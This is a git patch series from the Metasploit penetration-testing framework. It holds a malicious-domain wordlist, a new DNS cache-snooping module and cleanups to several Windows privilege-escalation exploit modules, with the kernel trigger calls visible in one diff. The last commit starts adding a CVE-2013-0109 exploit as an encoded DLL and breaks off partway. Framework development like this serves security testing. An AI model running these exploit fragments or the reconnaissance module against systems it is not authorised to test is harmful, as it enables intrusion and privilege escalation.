+www.psf-finist.ru +www.purplehorses.net +www.quickcraft.com.br +www.rcollard.com +www.realinnovation.com +www.realtimemedia.ru +www.rebeccacella.com +www.remaxhost.com +www.rempko.sk +www.riktoetenel.com +www.rlproject.xpg.com.br +www.romaleonardo.it +www.rooversadvocatuur.nl +www.roxpriv8.xpg.com.br +www.rtzdefacer.xpg.com.br +www.rtzdefacer2.xpg.com.br +www.rv-dds.nl +www.salonlaquintajardin.com +www.sama.kz +www.sanchoiv.com +www.sanseracingteam.com +www.scorpionbkn.xpg.com.br +www.searchenginesmarketingblog.com +www.secondome.com +www.serciudadano.com.ar +www.shadoww.co.in +www.sherrif.info +www.sigma-solutions.com.sg +www.sitepalace.com +www.slayerlife.com +www.slivki.com.ua +www.smilingsoulcoaching.com +www.solnechnyzaichik.ru +www.sonnoli.com +www.sowyen.co.kr +www.speedayauto.ae +www.spicermotors.net +www.spris.com +www.stdfiletonetansert.com.cn +www.stirparts.ru +www.stormpages.com +www.superintendente.xpg.com.br +www.suporte012009.xpg.com.br +www.t-sb.net +www.tdms.saglik.gov.tr +www.tehnika-hyundai.ru +www.temporadanova1.xpg.com.br +www.theartsgarage.com +www.thecorp.info +www.thekingpin.net +www.tiergestuetzt.de +www.timothykempbloodstock.co.nz +www.tmplookup.com +www.topedu.cn +www.torgi.kz +www.tpt.edu.in +www.tudoaqui2.xpg.com.br +www.ucheba.ru +www.unimedvr.com.br +www.unisgolf.ch +www.unixpoint02.xpg.com.br +www.uriyuri.com +www.usaenterprise.com +www.vamos2009.xpg.com.br +www.vip-file.eu +www.vvvic.com +www.vw-freaks.net +www.weblist.xpg.com.br +www.whataviewwindowcleaning.com +www.whitesports.co.kr +www.widestep.com +www.wigglewoo.com +www.wildsap.com +www.wilfharwood.com +www.windelectric.ua +www.witkey.com +www.wps.cn +www.wrestlingexposed.com +www.wtcorp.net +www.wypoczynku.www.wypoczynet.pl +www.wyroki.eu +www.xiruz.kit.net +www.xn----7sbhclawz4amhce8d.xn--p1ai +www.xn----btbheac0cddhg5d.xn--p1ai +www.xxparceroxx.xpg.com.br +www.yac.mx +www.ypu.edu.tw +www.zfttk.ru +www.zyhydh.com +www.zyxyfy.com +www12.0zz0.com +www2.unionfilesexchnges.su +www8.0zz0.com +wzhj.net +wzk.laweb.es +xamateurpornlic.www1.biz +xaumous.club-106.com.ar +xbox360modding.net +xchao123.com +xe-11-0-0.edge1.losangeles6.levei-3.net +xeclex.bl.ee +xetoware.com +xiazaiba.com +xiistones.com +xindalawyer.com +xinrongcaijing.com +xisrandom.net +xixiwg.com +xlcall.com +xlike.net +xlkj518.com +xmlbar.net +xn----htbhgq6ahee6j.xn--p1ai +xnxxwatch.com +xoomer.alice.it +xoqaquqo.the-elites.com +xorgwebs.webs.com +xpopup.com +xpornstarsckc.ddns.name +xquadra.com.mx +xserqwerdsdrasder.su +xtcheats.com +xtractb2b.info +xtremcolors.com +xtremedownload.com +xvidly.com +xxooss.com +xxxsexcamera.com +xzone-reactor.com +xzskycn.com +y2030.com +y611trsk.witnessvacant.biz +yachtfortylove.com +yalupa.com +yambotan.ru +yamleg.fu8.com +yanasushi.eu +yandex.ru.sgtfnregsnet.ru +yankeezzzz.co.uk +yanqing888.net +yaowan.com +yawclovm.net +yayasanmahasiswa.my +yazminx.com +ybabc.com +ybaopay.com +ydqxt.com +yesboan.com +yessign.or.kr +ygla.ru +yileweb.com +yiliwa.com +yj1b4.ru +yldsjs.com +yontoo.com +yougube.com +youngdevan.com +yourfilesdatak.asia +youronlineinsuranceagent.com +youtibe.com +youtope.net +youtubeaccelerator.com +youtuhe.com +youxiaxiazai.com +ytanchor.com +ytdownloader.com +ytoimneyqawernmkla.deswelt.net +yunbo99.com +yvettedefrance.com +yxbao.com +yytt77.com +yyzsoft.com +z32538.nb.host127-0-0-1.com +z43b1z.eu +z7752.com +z8games.com +za.omovigminet.ru +zaebiz.eu +zaebstonrder.com +zametki-gurmana.ru +zapto.org +zbf1.com +zbjimg.com +zc287xl.servepics.com +zctei.com +zeus.guvencelikimalat.com +zgorogo.in.ua +zgsysz.com +zhenhua.org +zhongjiebao.com +zhuoku.com +zhuti.com +zhuti6.com +zillionfasttax.info +zilliontoolkitusa.info +zinetag.net +ziputil.net +zjject.com +zkic.com +zmp3.net +zook.co.kr +zoomaru.com +zoomdownloader.com +zous.szm.sk +zrtontoskerfree.net +zswe4tfrhdhthr5.su +ztgame.com.cn +zukkoshop.su +zwierzu.zxy.me +zxr0.chickenkiller.com +zxr0.strangled.net +zydsoft.com diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb new file mode 100644 index 0000000000..0bfb24b117 --- /dev/null +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -0,0 +1,111 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'net/dns/resolver' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Non-Recursive Record Scraper', + 'Description' => %q{ + This module can be used to scrape records that have been cached + by a specific nameserver. The module allows the tester to test + every record from a specified file + }, + 'Author'=> [ + 'Brandon McCann "zeknox" ', + 'Rob Dixon "304geek" ' + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'] + ])) + + register_options([ + OptString.new('DOMAIN', [ false, "Domain name to query for"]), + OptPath.new('WORDLIST', [ true, "Wordlist for domain name queries", ::File.join(Msf::Config.install_root, "data", "wordlists", "av-update-urls.txt")]), + OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]), + ], self.class) + + register_advanced_options([ + OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]), + ], self.class) + end + + # method to scrape dns + def scrape_dns(domain) + + # dns request with recursive disabled + use_tcp = datastore['TCP_DNS'] == true + res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp) + + # query dns + begin + query = res.send(domain) + rescue + print_error("Issues with #{domain}") + return + end + + # found or not found + if query.answer.empty? + vprint_status("#{domain} - Not Found") + return + end + + print_good("#{domain} - Found") + report_goods(domain) + end + + # method to read each line from file + def read_file + ::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line| + scrape_dns(line.chomp) + end + end + + # log results to database + def report_goods(domain) + report_service( + :host => datastore['NS'], + :name => "dns", + :port => 53, + :proto => "udp", + :info => "#{domain} cached" + ) + + report_note( + :host => datastore['NS'], + :name => "dns", + :port => 53, + :proto => "udp", + :type => "dns.cache.scrape", + :data => "#{domain} cached" + ) + + report_host( + :address => datastore['NS'], + :info => "#{domain} cached", + :comments => "DNS Cache Scraper" + ) + end + + # main control method + def run + print_status("Making queries against #{datastore['NS']}") + + if datastore['DOMAIN'].blank? + read_file + else + scrape_dns(datastore['DOMAIN']) + end + end +end + From dba0e9bf77a623f278aa0b36fddd07c9c6a1daf8 Mon Sep 17 00:00:00 2001 From: zeknox Date: Thu, 12 Dec 2013 20:30:46 -0600 Subject: [PATCH 026/205] msftidy done --- modules/auxiliary/gather/dns_cache_scraper.rb | 174 +++++++++--------- 1 file changed, 86 insertions(+), 88 deletions(-) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 0bfb24b117..1a3143cb4b 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -1,111 +1,109 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'net/dns/resolver' class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report + include Msf::Auxiliary::Report - def initialize(info = {}) - super(update_info(info, - 'Name' => 'DNS Non-Recursive Record Scraper', - 'Description' => %q{ - This module can be used to scrape records that have been cached - by a specific nameserver. The module allows the tester to test - every record from a specified file - }, - 'Author'=> [ - 'Brandon McCann "zeknox" ', - 'Rob Dixon "304geek" ' - ], - 'License' => MSF_LICENSE, - 'References' => [ - ['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'] - ])) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Non-Recursive Record Scraper', + 'Description' => %q{ + This module can be used to scrape records that have been cached + by a specific nameserver. The module allows the tester to test + every record from a specified file + }, + 'Author'=> [ + 'Brandon McCann "zeknox" ', + 'Rob Dixon "304geek" ' + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'] + ])) - register_options([ - OptString.new('DOMAIN', [ false, "Domain name to query for"]), - OptPath.new('WORDLIST', [ true, "Wordlist for domain name queries", ::File.join(Msf::Config.install_root, "data", "wordlists", "av-update-urls.txt")]), - OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]), - ], self.class) + register_options([ + OptString.new('DOMAIN', [ false, "Domain name to query for"]), + OptPath.new('WORDLIST', [ true, "Wordlist for domain name queries", ::File.join(Msf::Config.install_root, "data", "wordlists", "av-update-urls.txt")]), + OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]), + ], self.class) - register_advanced_options([ - OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]), - ], self.class) - end + register_advanced_options([ + OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]), + ], self.class) + end - # method to scrape dns - def scrape_dns(domain) + # method to scrape dns + def scrape_dns(domain) - # dns request with recursive disabled - use_tcp = datastore['TCP_DNS'] == true - res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp) + # dns request with recursive disabled + use_tcp = datastore['TCP_DNS'] == true + res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp) - # query dns - begin - query = res.send(domain) - rescue - print_error("Issues with #{domain}") - return - end + # query dns + begin + query = res.send(domain) + rescue + print_error("Issues with #{domain}") + return + end - # found or not found - if query.answer.empty? - vprint_status("#{domain} - Not Found") - return - end + # found or not found + if query.answer.empty? + vprint_status("#{domain} - Not Found") + return + end - print_good("#{domain} - Found") - report_goods(domain) - end + print_good("#{domain} - Found") + report_goods(domain) + end - # method to read each line from file - def read_file - ::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line| - scrape_dns(line.chomp) - end - end + # method to read each line from file + def read_file + ::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line| + scrape_dns(line.chomp) + end + end - # log results to database - def report_goods(domain) - report_service( - :host => datastore['NS'], - :name => "dns", - :port => 53, - :proto => "udp", - :info => "#{domain} cached" - ) + # log results to database + def report_goods(domain) + report_service( + :host => datastore['NS'], + :name => "dns", + :port => 53, + :proto => "udp", + :info => "#{domain} cached" + ) - report_note( - :host => datastore['NS'], - :name => "dns", - :port => 53, - :proto => "udp", - :type => "dns.cache.scrape", - :data => "#{domain} cached" - ) + report_note( + :host => datastore['NS'], + :name => "dns", + :port => 53, + :proto => "udp", + :type => "dns.cache.scrape", + :data => "#{domain} cached" + ) - report_host( - :address => datastore['NS'], - :info => "#{domain} cached", - :comments => "DNS Cache Scraper" - ) - end + report_host( + :address => datastore['NS'], + :info => "#{domain} cached", + :comments => "DNS Cache Scraper" + ) + end - # main control method - def run - print_status("Making queries against #{datastore['NS']}") + # main control method + def run + print_status("Making queries against #{datastore['NS']}") - if datastore['DOMAIN'].blank? - read_file - else - scrape_dns(datastore['DOMAIN']) - end - end + if datastore['DOMAIN'].blank? + read_file + else + scrape_dns(datastore['DOMAIN']) + end + end end From 9f18c57fceb4aa7494b733da5d2d9ddf859ba3d3 Mon Sep 17 00:00:00 2001 From: zeknox Date: Thu, 12 Dec 2013 22:11:02 -0600 Subject: [PATCH 027/205] added period to description and changed tester to user --- modules/auxiliary/gather/dns_cache_scraper.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 1a3143cb4b..f6e4f248df 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -14,8 +14,8 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'DNS Non-Recursive Record Scraper', 'Description' => %q{ This module can be used to scrape records that have been cached - by a specific nameserver. The module allows the tester to test - every record from a specified file + by a specific nameserver. The module allows the user to test + every record from a specified file. }, 'Author'=> [ 'Brandon McCann "zeknox" ', From d6e19df8e2a6b2fa81978f4c6da5082eba3e4c14 Mon Sep 17 00:00:00 2001 From: zeknox Date: Thu, 12 Dec 2013 22:57:23 -0600 Subject: [PATCH 028/205] added additional url reference --- modules/auxiliary/gather/dns_cache_scraper.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index f6e4f248df..23ed1d8ebe 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -23,7 +23,8 @@ class Metasploit3 < Msf::Auxiliary ], 'License' => MSF_LICENSE, 'References' => [ - ['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'] + ['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'], + ['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf'] ])) register_options([ From e6f1f648be92913a115fea606a30e8ada3195bec Mon Sep 17 00:00:00 2001 From: zeknox Date: Fri, 13 Dec 2013 10:49:44 -0600 Subject: [PATCH 029/205] modified wordlist path, modified report_goods to log udp or tcp, made wordlist not required --- modules/auxiliary/gather/dns_cache_scraper.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 23ed1d8ebe..34137cfdd6 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary register_options([ OptString.new('DOMAIN', [ false, "Domain name to query for"]), - OptPath.new('WORDLIST', [ true, "Wordlist for domain name queries", ::File.join(Msf::Config.install_root, "data", "wordlists", "av-update-urls.txt")]), + OptPath.new('WORDLIST', [ false, "Wordlist for domain name queries", ::File.join(Msf::Config.data_directory, "wordlists", "av-update-urls.txt")]), OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]), ], self.class) @@ -72,11 +72,17 @@ class Metasploit3 < Msf::Auxiliary # log results to database def report_goods(domain) + if datastore['TCP_DNS'] + proto = "tcp" + else + proto = "udp" + end + report_service( :host => datastore['NS'], :name => "dns", :port => 53, - :proto => "udp", + :proto => proto, :info => "#{domain} cached" ) @@ -84,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary :host => datastore['NS'], :name => "dns", :port => 53, - :proto => "udp", + :proto => proto, :type => "dns.cache.scrape", :data => "#{domain} cached" ) From 6931c918af7555c4a31c0da0a9018182dcec98d9 Mon Sep 17 00:00:00 2001 From: zeknox Date: Fri, 13 Dec 2013 12:13:23 -0600 Subject: [PATCH 030/205] removed bogus urls that are throwing errors --- data/wordlists/malicious_urls.txt | 2 -- 1 file changed, 2 deletions(-) diff --git a/data/wordlists/malicious_urls.txt b/data/wordlists/malicious_urls.txt index 0d819b1763..0b0acc439c 100644 --- a/data/wordlists/malicious_urls.txt +++ b/data/wordlists/malicious_urls.txt @@ -47,7 +47,6 @@ 360edu.com 360tpcdn.com 365idc.com -3906523995308773357-a-1802744773732722657-s-sites.googlegroups.com 3apa3a.tomsk.tw 3dmodelagem.com 3dvideodownload.com @@ -764,7 +763,6 @@ dape.net dargs.su darkboard.net darker.in.ua -dasch.pl dashuxmaecrme.com dashuxmaecrmecia.ws data.sfvolleyball.net From 1ab3e891c9d70f0446ac1f108c1bacb0c0896872 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 13 Dec 2013 15:54:34 -0600 Subject: [PATCH 031/205] Modify ms_ndproxy to use railgun additions --- modules/exploits/windows/local/ms_ndproxy.rb | 38 -------------------- 1 file changed, 38 deletions(-) diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index 0b9a32f593..1628c66f3d 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -87,44 +87,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', From e8396dc37af0c81928c9908d338e229cb4a32973 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 13 Dec 2013 16:02:47 -0600 Subject: [PATCH 032/205] Delete redefinition of ntdll functions on railgun --- .../windows/local/ms11_080_afdjoinleaf.rb | 38 ------------------- .../windows/local/novell_client_nicm.rb | 38 ------------------- .../windows/local/novell_client_nwfs.rb | 38 ------------------- 3 files changed, 114 deletions(-) diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 40256e55fe..636f60f378 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -172,19 +172,6 @@ class Metasploit3 < Msf::Exploit::Local irpstuff << rand_text_alpha(231) if not this_proc.memory.writable?(0x1000) - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end if not this_proc.memory.writable?(0x1000) @@ -261,31 +248,6 @@ class Metasploit3 < Msf::Exploit::Local return end - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] - ]) - print_status("Triggering AFDJoinLeaf pointer overwrite...") result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 77f1fccadd..a219d3905b 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb @@ -67,44 +67,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index cd46a57950..ac5f8f5407 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb @@ -63,44 +63,6 @@ class Metasploit3 < Msf::Exploit::Local end def add_railgun_functions - session.railgun.add_function( - 'ntdll', - 'NtAllocateVirtualMemory', - 'DWORD', - [ - ["DWORD", "ProcessHandle", "in"], - ["PBLOB", "BaseAddress", "inout"], - ["PDWORD", "ZeroBits", "in"], - ["PBLOB", "RegionSize", "inout"], - ["DWORD", "AllocationType", "in"], - ["DWORD", "Protect", "in"] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtDeviceIoControlFile', - 'DWORD', - [ - [ "DWORD", "FileHandle", "in" ], - [ "DWORD", "Event", "in" ], - [ "DWORD", "ApcRoutine", "in" ], - [ "DWORD", "ApcContext", "in" ], - [ "PDWORD", "IoStatusBlock", "out" ], - [ "DWORD", "IoControlCode", "in" ], - [ "LPVOID", "InputBuffer", "in" ], - [ "DWORD", "InputBufferLength", "in" ], - [ "LPVOID", "OutputBuffer", "in" ], - [ "DWORD", "OutPutBufferLength", "in" ] - ]) - - session.railgun.add_function( - 'ntdll', - 'NtQueryIntervalProfile', - 'DWORD', - [ - [ "DWORD", "ProfileSource", "in" ], - [ "PDWORD", "Interval", "out" ] - ]) session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', From 999006e037217b645a615b60b36956292c186395 Mon Sep 17 00:00:00 2001 From: Matteo Cantoni Date: Sat, 14 Dec 2013 19:41:31 +0100 Subject: [PATCH 033/205] fixed some things, as suggested by jvazquez-r7 --- .../auxiliary/scanner/chargen/chargen_probe.rb | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/scanner/chargen/chargen_probe.rb b/modules/auxiliary/scanner/chargen/chargen_probe.rb index 21e347c836..7e5286392b 100644 --- a/modules/auxiliary/scanner/chargen/chargen_probe.rb +++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb @@ -7,7 +7,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - Rank = ManualRanking include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -43,11 +42,7 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('TIMEOUT', [true, 'Timeout for the Chargen probe', 5]), ]) - register_advanced_options([ - OptBool.new('DEBUG', [false, 'Show chargen server answer', false]), - ], self.class) - - deregister_options('PASSWORD','RHOST','USERNAME') + deregister_options('RHOST') end def to @@ -64,11 +59,9 @@ class Metasploit3 < Msf::Auxiliary while ((res = udp_sock.recvfrom(65535,0.1)) && (res[1])) - if (datastore['DEBUG']) - print_status("DEBUG: #{res.to_s}") - end + vprint_status("#{rhost}:#{rport} - Response: #{res[0].to_s}") - res = res.to_s.strip + res = res[0].to_s.strip if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/)) print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)") report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length) @@ -79,9 +72,9 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionError rescue Timeout::Error - print_error("#{rhost}:#{rport} server timed out after #{to} seconds. Skipping.") + vprint_error("#{rhost}:#{rport} server timed out after #{to} seconds. Skipping.") rescue ::Exception => e - print_error("#{e} #{e.backtrace}") + vprint_error("#{e} #{e.backtrace}") end end end From c6623b380ad6e87837147f16d001f0194f8b0e0e Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 5 Jul 2013 19:48:27 +0100 Subject: [PATCH 034/205] Initial commit --- data/exploits/CVE-2013-0109/exploit.dll | Bin 0 -> 52224 bytes .../source/exploits/cve-2013-0109/LICENSE.txt | 25 + .../source/exploits/cve-2013-0109/Readme.md | 40 ++ .../cve-2013-0109/dll/reflective_dll.sln | 20 + .../cve-2013-0109/dll/reflective_dll.vcproj | 357 ++++++++++++ .../cve-2013-0109/dll/reflective_dll.vcxproj | 266 +++++++++ .../dll/reflective_dll.vcxproj.filters | 32 ++ .../dll/reflective_dll.vcxproj.user | 3 + .../dll/src/ReflectiveDLLInjection.h | 51 ++ .../cve-2013-0109/dll/src/ReflectiveDll.c | 32 ++ .../cve-2013-0109/dll/src/ReflectiveLoader.c | 496 ++++++++++++++++ .../cve-2013-0109/dll/src/ReflectiveLoader.h | 203 +++++++ .../cve-2013-0109/dll/src/exploit.cpp | 537 ++++++++++++++++++ .../source/exploits/cve-2013-0109/rdi.sln | 32 ++ .../exploits/windows/local/nvidia_nvvsvc.rb | 115 ++++ 15 files changed, 2209 insertions(+) create mode 100644 data/exploits/CVE-2013-0109/exploit.dll create mode 100644 external/source/exploits/cve-2013-0109/LICENSE.txt create mode 100644 external/source/exploits/cve-2013-0109/Readme.md create mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.sln create mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj create mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj create mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters create mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user create mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h create mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c create mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c create mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h create mode 100644 external/source/exploits/cve-2013-0109/dll/src/exploit.cpp create mode 100644 external/source/exploits/cve-2013-0109/rdi.sln create mode 100644 modules/exploits/windows/local/nvidia_nvvsvc.rb diff --git a/data/exploits/CVE-2013-0109/exploit.dll b/data/exploits/CVE-2013-0109/exploit.dll new file mode 100644 index 0000000000000000000000000000000000000000..4600b48bf586e883978e45b55d28f858d26660b5 GIT binary patch literal 52224 zcmeFae{@tuwm*70-ANkg(2XP*BtXx|xenL&Q|156W4f}#dw5QTA~lhKOJXc(9fAm+T!uG5_a zb>6z~t@YOZ=QW&Dzjjsa+O?}{*REYBg+JXUnI%cG;L&wS+6$L{x#InQ|LQ>U$cb-^ zlwKS5{?&U;bKbvtzW;%>scWiM-(R)t!PNVfty;BOPQ7hC3rg+s4cuQ?TCYi9Xkxp74|-e7)%nPrh&;_oTp`Zr|g%Tfj~7SVTM%;p%yJ)z5b7J7e(Vbq?oHmn1)NzM#Ri9Vvk)7*MVo72s?y7 zMv`JBlZc4AQU@YItm+RXDMrdgA~I3F0oMrbcukV#A@I(7qqb5f5Ba4^($br&mM@c+ zp)He;fHI})@YLWL^28>Hc|KI!n0Ry(| zYSEJ{+a$;N6XTk$_4Kj7mNg%a`~a_>wz`_Unx{|m^bTg!lWfSrE{8sRxKhGDGrj#N zw#lm}fy*4MEjZmIN)HW`Y*et922Dj{!55Na?{s+Wd)nE7lF%295eHr;K7M;PQqI2O zYN}|QeT~V{I0vu2)A4JZPr-%sT1>B{^jeNrYpfUV4Y`=xsMIBwSJ)csM=Dj?8oLrc zc;H(@KFVQ3@bww^h2w(1qBO0Z;MFF}8>vW7Z&$wAOA!Nww#L@q8!c}ue3Yj(b{l-T zGot0)h2LO#1b5FaO5m 